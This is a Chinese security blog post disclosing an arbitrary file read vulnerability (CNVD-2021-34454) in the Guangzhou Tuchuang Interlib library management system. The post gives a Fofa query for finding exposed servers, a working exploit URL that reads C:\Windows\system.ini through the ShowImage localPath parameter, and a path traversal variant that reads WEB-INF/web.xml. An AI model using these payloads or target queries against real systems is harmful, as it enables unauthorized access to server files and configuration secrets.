您的位置 首页 0day

(0day)某图书馆管理系统存在任意文件读取漏洞

某图书馆管理系统存在任意文件读取漏洞

月球挖的月球挖的

CNVD-2021-34454

案例收集:

Fofa语句:

“广州图创” && country=”CN” && body=”/interlib/common/”

漏洞url:

/interlib/report/ShowImage?localPath=C:\Windows\system.ini

漏洞复现

访问抓包才能看见数据

5.13版本之前修复了跨磁盘,5.20号版本跨目录../interlib/WEB-INF/web.xml

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/2130/
考研勇士 LiAoRJ

作者: 考研勇士

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...

评论列表(2)

联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部